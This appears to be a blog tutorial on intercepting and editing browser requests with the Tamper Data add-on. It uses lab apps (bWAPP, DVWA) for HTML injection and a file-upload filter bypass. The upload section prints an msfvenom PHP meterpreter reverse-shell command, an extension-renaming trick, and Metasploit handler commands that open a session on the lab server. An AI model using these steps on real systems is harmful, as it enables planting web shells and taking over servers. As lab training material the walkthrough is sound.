One
of the more popular hacker tools for Firefox is an add-on called Tamper Data. Tamper Data isn't a super
complicated tool; it's merely a proxy, or go-between, that inserts it
in-between the user and the web site or web application that they are browsing.
All
those GETs and POSTs can be manipulated without the constraints imposed by the user
interface seen in the browser.
It
allows a person to tamper with the data being sent back and forth between the
client and the server. When Tamper Data is started and a web app or website is
launched in Firefox, Tamper Data will show all of the fields that allow user
input or manipulation.
Hackers
can then change a field to an "alternate value" and send the data to
the server to see how it reacts.
Installing Tamper Data Add-On
Select the menu bar on the right end in Firefox. Click on Add-ons.
In
the search bar field, search for Tamper Data add-on. Click on Install after installing the add-on, restart the Firefox Browser.
Displaying clear text password in Facebook using
Tamper Data
Now
I am trying to login into my Facebook account and when I typed my password I
see the “password in dotted form" so I wanted to know whether the password
typed is correct or not. Click on tools option from menu bar and select tamper data to capture the
request
A
pop will get open for tamper data click
on start tamper which start
capturing the ongoing request As we know that the username and password typed
in the fields go through POST method.
Now After that click on Login button to send the data through
POST method.
When
the request will send through browser to web server a pop up will appear, now
hit Tamper, which will start
capturing the sending request.
Now
you can see from given image on the right half of Tamper Popup window it is
showing the email and pass in clear text.
HTML Injection - Reflection POST method with Tamper
Data
I have installed bWAPP
on my wamp server running on localhost. It
can be accessed through browser. Navigate to login page using url “localhost/bWAPP/login.php".
Login into web application server by typing bee: bug as login credential, now choose
your bug” html injection-reflected
(post)” from given list of bugs and click
on hack.
In
given text field enter first name: kunal
and last name: bhal.
Before clicking Go;
again start tamper data to
change the field values. After that
we can see the post values and now modify it to change the username of any
person.
Now
click on go and a dialog box get opened here click on tamper to
capture the request.
Here
you can read the captured request from given screenshot which has captured the first and last name kunal: bhal.
Tamper data allow you to modify the sent request of
any user without his permission, so I am going to change first and last name
given by user into first as first name and last as last name and
then click on ok to forword the request.
Now you can see the request has been forward on the web
server.
We
successfully changed the username of the person; here you can see username to
be "first last". Similarly
you can use other modules with tamper data to exploit bWAPP.
File upload using tamper data
Now
open the DVWA in your browser with your local IP as 192.168.1.102:81/DVWA and
login with following credentials:
Username –
admin
Password –
password
Click
on DVWA Security and set Website Security
Level medium then select file upload vulnerability
Open terminal
in kali linux and create php backdoor through following command
msfvenom -p php/meterpreter/reverse_tcp
lhost=192.168.1.103 lport=4444 -f raw
Copy and paste the
highlighted code in leafpad and save as with PHP extension as hacked.php.png on
the desktop.
Load metasploit framework type
msfconsole and start multi handler.
Now click to browse button to browse hacked.php.png file to upload.
Click on tools option from menu bar and select tamper data to capture the
request.
Before
clicking upload; again start tamper data and then click on upload; when the request will send through browser to web server a
pop up will appear then, now hit Tamper, which will intercept the
sending request.
From
given screenshot you can see tamper data has capture the POST request now copy the selected data from POST DATA.
Paste POST DATA in a text file to
change the extension of our upload. As you can read the name of file is
hack.php.png but we want to upload a php file.
Now
modify pasted POST DATA hacked.php.png into hacked.php then select and copy the complete data.
Now
past the whole data of text file in the field given for POST DATA and click on ok
So
here we have forward the modified request, now click on stop tamper.
From screenshot you can see our php is uploaded in
uploads directory. Now copy the highlighted path /hackable/uploads/hacked.php where file is uploaded and run this path
http://192.168.1.102:81/DVWA/hackable/uploads/hacked.php
in URL to execute it.
You will get victim reverse connection on metasploit.
msf > use multi/handler
msf exploit(handler) > set payload
php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.103
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
meterpreter > sysinfo
I have got meterpreter session of victim PC
0 comments:
Post a Comment